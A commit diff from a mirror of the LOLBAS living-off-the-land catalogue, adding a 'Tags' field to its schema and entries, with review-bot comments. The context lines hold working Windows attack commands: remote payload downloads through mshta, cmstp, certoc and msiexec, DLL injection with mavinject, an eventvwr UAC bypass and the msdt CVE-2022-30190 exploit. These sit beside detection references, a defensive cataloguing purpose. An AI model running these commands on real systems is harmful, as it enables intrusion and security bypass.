mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-26 23:09:06 +01:00
* Adding various tags as a first iteration
* Adding quotes
* Adding 'Custom Format' properly
* Updating to key:value pairs
* Update template
This commit is contained in:
parent
a945bac6be
commit
ebbf08ec4d
1
.github/workflows/gh-pages.yml
vendored
@ -20,6 +20,7 @@ jobs:
mv yml/OSBinaries yml/Binaries
mv yml/OSLibraries yml/Libraries
mv yml/OSScripts yml/Scripts
rm -r yml/HonorableMentions

- name: Deploy to LOLBAS-Project.github.io repo
uses: peaceiris/actions-gh-pages@v3
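Review bot: `rm -r yml/HonorableMentions` has no `-f`, so on a checkout where that directory is absent the step fails (the default `run` shell on GitHub-hosted Linux runners is `bash -e`) and the following `- name: Deploy to LOLBAS-Project.github.io repo` step never runs; `rm -rf yml/HonorableMentions` keeps the publish step idempotent. A one-line comment on why HonorableMentions is excluded from the published site would also help the next person editing this workflow.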
@ -57,6 +57,14 @@ mapping:
"OperatingSystem":
type: str
required: true
"Tags":
type: seq
sequence:
- type: map
mapping:
regex;(^[A-Z]):
type: str
required: false
"Full_Path":
type: seq
required: true
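Review bot: the new `"Tags"` rule only constrains tag keys (`regex;(^[A-Z])`, i.e. any key beginning with a capital letter) and leaves values as free-form `str`, so the vocabulary this change introduces (`Execute`, `Input`, `Download`, `Type`, `Application` with values such as `DLL`, `WSH`, `INetCache`, `Compression`, `GUI`) is not enforced and a misspelt key or value still validates. Consider an explicit `enum` for the keys (and per-key values), or at least document the allowed set next to the schema. Note also that the `regex;` key lets one list item carry several tag keys, while every entry in this change uses exactly one `- Key: Value` pair per item; if one-per-item is the intended shape, say so in the template.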
@ -13,6 +13,8 @@ Commands:
Privileges: Required privs
MitreID: T1055
OperatingSystem: Windows 10 1803, Windows 10 1703
Tags:
- Key1: Value1 # Optional field for one or more tags
- Command: The second command
Description: Description of the second command
Usecase: A description of the usecase
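Review bot: the template comment `# Optional field for one or more tags` documents neither the allowed keys nor the expected values, and the schema accepts any capitalised key, so contributors have nothing to copy from. List the vocabulary this change actually uses (`Execute`, `Input`, `Download`, `Type`, `Application`) with an example value for each, either in this comment or in the contribution docs, so new entries stay consistent with the ones tagged here.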
@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-12-02
Commands:
- Command: start ms-appinstaller://?source=https://pastebin.com/raw/tdyShwLw
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>
Description: AppInstaller.exe is spawned by the default handler for the URI, it attempts to load/install a package from the URL and is saved in INetCache.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.11.2521.0_x64__8wekyb3d8bbwe\AppInstaller.exe
Detection:
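Review bot: the rewritten Description replaces the concrete drop location (`C:\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>`) with the bare word `INetCache`, but that per-package path is what a file-event detection or a triage checklist needs, and the new `- Download: INetCache` tag does not carry it. Keep the path in the Description (or move it to a Detection/Resources field) rather than deleting it; the same loss occurs in the other Descriptions shortened to `INetCache` in this change, including the IMEWDBLD entry whose two `%LocalAppData%\Microsoft\Windows\INetCache\...` paths are removed.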
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows Server 2022
Tags:
- Execute: DLL
- Command: certoc.exe -GetCACAPS https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1
Description: Downloads text formatted files
Usecase: Download scripts, webshells etc.
@ -21,8 +23,6 @@ Commands:
Full_Path:
- Path: c:\windows\system32\certoc.exe
- Path: c:\windows\syswow64\certoc.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_certoc_load_dll.yml
- IOC: Process creation with given parameter
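Review bot: this hunk shrinks from 8 to 6 lines, so the empty `Code_Sample:` / `- Code:` pair is being dropped; the same two-line removal recurs in the later hunks whose counts shrink by two alongside the two added `Tags` lines. That is a sensible cleanup, but the schema hunk above only shows the `Tags` addition: confirm `Code_Sample` is not `required: true` in the schema, otherwise validation in the gh-pages workflow fails for exactly the entries cleaned up here.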
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Input: INF
- Command: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf
Description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll.
Usecase: Execute code hidden within an inf file. Execute code directly from Internet.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218.003
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Input: INF
Full_Path:
- Path: C:\Windows\System32\cmstp.exe
- Path: C:\Windows\SysWOW64\cmstp.exe
@ -12,12 +12,14 @@ Commands:
MitreID: T1567
OperatingSystem: Windows 10
- Command: ConfigSecurityPolicy.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
- Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe
@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1218.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\control.exe
- Path: C:\Windows\SysWOW64\control.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules-emerging-threats/2021/Exploits/CVE-2021-40444/proc_creation_win_exploit_cve_2021_40444.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_control_dll_load.yml
@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\System32\cscript.exe
- Path: C:\Windows\SysWOW64\cscript.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
Tags:
- Type: Compression
- Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Description: Download and compress a remote file and store it in a cab file on local machine.
Usecase: Download and compress into a cab file.
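Review bot: the context line `OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.` carries a stray trailing period and the lowercase `vista` that most entries in this change use, while others (`Netsh`, `PrintBrm`) write `Windows Vista`; since these files are being touched anyway, normalise both. Separately, `- Type: Compression` records what diantz is, not what the following `\\remotemachine\...` command is used for (a download, mapped to `T1105` in the next hunk); adding a `Download` tag alongside would keep the tag semantics in line with the `Download: INetCache` entries elsewhere in this change.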
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
Tags:
- Type: Compression
Full_Path:
- Path: c:\windows\system32\diantz.exe
- Path: c:\windows\syswow64\diantz.exe
@ -11,11 +11,11 @@ Commands:
Privileges: DNS admin
MitreID: T1543.003
OperatingSystem: Windows server
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\Dnscmd.exe
- Path: C:\Windows\SysWOW64\Dnscmd.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
- IOC: Dnscmd.exe loading dll from UNC/arbitrary path
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1548.002
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
- Command: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews & eventvwr.exe
Description: During startup, eventvwr.exe uses .NET deserialization with %LOCALAPPDATA%\Microsoft\EventV~1\RecentViews file. This file can be created using https://github.com/pwntester/ysoserial.net
Usecase: Execute a command to bypass security restrictions that limit the use of command-line interpreters.
@ -18,6 +20,8 @@ Commands:
Privileges: Administrator
MitreID: T1548.002
OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Application: GUI
Full_Path:
- Path: C:\Windows\System32\eventvwr.exe
- Path: C:\Windows\SysWOW64\eventvwr.exe
@ -28,8 +28,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\Expand.exe
- Path: C:\Windows\SysWOW64\Expand.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
@ -11,11 +11,11 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Internet Explorer\Extexport.exe
- Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml
- IOC: Extexport.exe loads dll and is execute from other folder the original path
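Review bot: the context line `- IOC: Extexport.exe loads dll and is execute from other folder the original path` is ungrammatical and ambiguous about what the indicator actually is; while this file is open, reword it to say what a detection should key on, e.g. "Extexport.exe executed from a directory other than its two Full_Path locations, loading a DLL from that directory".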
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
Usecase: Extract data from cab file and hide it in an alternate data stream.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
Description: Copy the source file to the destination file and overwrite it.
Usecase: Download file from UNC/WEBDav
@ -5,12 +5,14 @@ Author: 'Wade Hickey'
Created: 2020-03-05
Commands:
- Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION> or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/<FILENAME>[1].<EXTENSION>
Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to INetCache.
Usecase: Download file from Internet
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Detection:
@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
Description: Execute the target .NET DLL or EXE.
Usecase: Use to execute code and bypass application whitelisting
@ -18,13 +21,18 @@ Commands:
Privileges: User
MitreID: T1218.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: InstallUtil.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
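Review bot: `- Input: Custom Format` says almost nothing as a tag value. The Description on the `/U AllTheThings.dll` command already states that the target is a .NET DLL or EXE, and the same `Custom Format` value is reused for the regasm and regsvcs entries later in this change, whose inputs are likewise .NET assemblies; a value naming the format (for instance `Input: .NET assembly`) would let the tag distinguish these entries from the `INF`, `.RSP` and CAB inputs documented elsewhere in this change. It would also make the schema's free-form `str` value less of a liability.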
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: jsc.exe /t:library Library.js
Description: Use jsc.exe to compile JavaScript code stored in Library.js and output Library.dll.
Usecase: Compile attacker code on system. Bypass defensive counter measures.
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1127
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
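Review bot: `- Execute: WSH` is applied to both jsc.exe commands, but the Description on the `/t:library Library.js` command says jsc compiles JavaScript and outputs `Library.dll`: jsc.exe is the JScript.NET compiler under `Microsoft.NET\Framework\v4.0.30319`, and nothing here is executed by Windows Script Host. Anyone filtering on the WSH tag to find cscript/wscript/mshta-style script execution gets a compiler instead. The entries are already mapped to T1127 (Trusted Developer Utilities), so a compilation-oriented tag would be more accurate; the same applies to the `vbc` entry at the end of this change.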
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab
Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
Usecase: Hide data compressed into an alternate data stream
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab
Description: Download and compresses the target file and stores it in the target file.
Usecase: Download file and compress into a cab file
@ -25,11 +29,11 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path:
- Path: C:\Windows\System32\makecab.exe
- Path: C:\Windows\SysWOW64\makecab.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.013
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll"
Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
Usecase: Inject dll file into running process
@ -18,11 +20,11 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\mavinject.exe
- Path: C:\Windows\SysWOW64\mavinject.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
- IOC: mavinject.exe should not run unless APP-v is in use on the workstation
@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msbuild.exe project.proj
Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+.
Usecase: Execute project file that contains XslTransformation tag parameters
@ -32,6 +34,8 @@ Commands:
Privileges: User
MitreID: T1127.001
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: msbuild.exe @sample.rsp
Description: By putting any valid msbuild.exe command-line options in an RSP file and calling it as above will interpret the options as if they were passed on the command line.
Usecase: Bypass command-line based detections
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
Usecase: Execute code bypass Application whitelisting
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
- Command: msdt.exe /id PCWDiagnostic /skip force /param "IT_LaunchMethod=ContextMenu IT_BrowseForFile=/../../$(calc).exe"
Description: Executes arbitrary commands using the Microsoft Diagnostics Tool and leveraging the "PCWDiagnostic" module (CVE-2022-30190). Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.
Usecase: Execute code bypass Application allowlisting
@ -25,6 +29,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Application: GUI
Full_Path:
- Path: C:\Windows\System32\Msdt.exe
- Path: C:\Windows\SysWOW64\Msdt.exe
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: WSH
- Command: mshta.exe vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))
Description: Executes VBScript supplied as a command line argument.
Usecase: Execute code
@ -32,13 +34,17 @@ Commands:
Privileges: User
MitreID: T1218.005
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
Tags:
- Execute: WSH
- Command: mshta.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\System32\mshta.exe
- Path: C:\Windows\SysWOW64\mshta.exe
@ -25,6 +25,8 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /z "C:\folder\evil.dll"
Description: Calls DLLUnregisterServer to un-register the target DLL.
Usecase: Execute dll files
@ -32,6 +34,8 @@ Commands:
Privileges: User
MitreID: T1218.007
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: msiexec /i "https://trustedURL/signed.msi" TRANSFORMS="https://evilurl/evil.mst" /qb
Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a Transformfile will be used, which can contains malicious code or binaries. The /qb will skip user input.
Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server
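Review bot: the context lines `Usecase: Install trusted and signed msi file, with additional attack code as Treansorm file, from remote server` and `Additional to the file a Transformfile will be used, which can contains malicious code or binaries` carry a typo (`Treansorm`) and grammar errors (`can contains`, `Additional to the file`); since this entry is being edited, fix them in the same commit, e.g. "a transform file (.mst) is applied in addition, which can contain malicious code or binaries".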
@ -42,8 +46,6 @@ Commands:
Full_Path:
- Path: C:\Windows\System32\msiexec.exe
- Path: C:\Windows\SysWOW64\msiexec.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml
@ -11,11 +11,11 @@ Commands:
Privileges: Admin
MitreID: T1546.007
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\WINDOWS\System32\Netsh.exe
- Path: C:\WINDOWS\SysWOW64\Netsh.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml
- Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: |
odbcconf INSTALLDRIVER "lolbas-project|Driver=c:\test\test.dll|APILevel=2"
odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
@ -20,6 +22,8 @@ Commands:
Privileges: User
MitreID: T1218.008
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Command: odbcconf -f file.rsp
Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
Usecase: Execute dll file using technique that can evade defensive counter measures
@ -11,6 +11,8 @@ Commands:
Privileges: Administrator
MitreID: T1218
OperatingSystem: Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection:
@ -18,6 +18,8 @@ Commands:
Privileges: User
MitreID: T1202
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
Tags:
- Execute: DLL
- Command: pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
Description: Open the target .CPL file with the Program Compatibility Assistant.
Usecase: Execution of CPL files
@ -27,8 +29,6 @@ Commands:
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
- Path: C:\Windows\System32\pcalua.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml
Resources:
@ -12,12 +12,14 @@ Commands:
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
- Command: Presentationhost.exe https://example.com/payload
Description: It will download a remote payload and place it in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server
Category: Download
Privileges: User
MitreID: T1105
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Download: INetCache
Full_Path:
- Path: C:\Windows\System32\Presentationhost.exe
- Path: C:\Windows\SysWOW64\Presentationhost.exe
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1105
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
- Command: PrintBrm -r -f C:\Users\user\Desktop\data.txt:hidden.zip -d C:\Users\user\Desktop\new_folder
Description: Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder
Usecase: Decompress and extract a ZIP file stored on an alternate data stream to a new folder
@ -18,6 +20,8 @@ Commands:
Privileges: User
MitreID: T1564.004
OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Type: Compression
Full_Path:
- Path: C:\Windows\System32\spool\tools\PrintBrm.exe
Detection:
@ -11,10 +11,10 @@ Commands:
Privileges: User, Administrator in Windows 8
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\rasautou.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_rasautou_dll_execution.yml
- IOC: rasautou.exe command line containing -d and -p
@ -11,6 +11,9 @@ Commands:
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regasm.exe /U AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the UnRegisterClass function.
Usecase: Execute code and bypass Application whitelisting
@ -18,13 +21,14 @@ Commands:
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
@ -11,6 +11,8 @@ Commands:
Privileges: User
MitreID: T1218
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
Full_Path:
- Path: C:\Windows\System32\Register-cimprovider.exe
- Path: C:\Windows\SysWOW64\Register-cimprovider.exe
@ -11,6 +11,9 @@ Commands:
Privileges: User
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
- Command: regsvcs.exe AllTheThingsx64.dll
Description: Loads the target .DLL file and executes the RegisterClass function.
Usecase: Execute dll file and bypass Application whitelisting
@ -18,11 +21,12 @@ Commands:
Privileges: Local Admin
MitreID: T1218.009
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Tags:
- Execute: DLL
- Input: Custom Format
Full_Path:
- Path: c:\Windows\Microsoft.NET\Framework\v*\regsvcs.exe
- Path: c:\Windows\Microsoft.NET\Framework64\v*\regsvcs.exe
Code_Sample:
- Code:
Detection:
- Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml
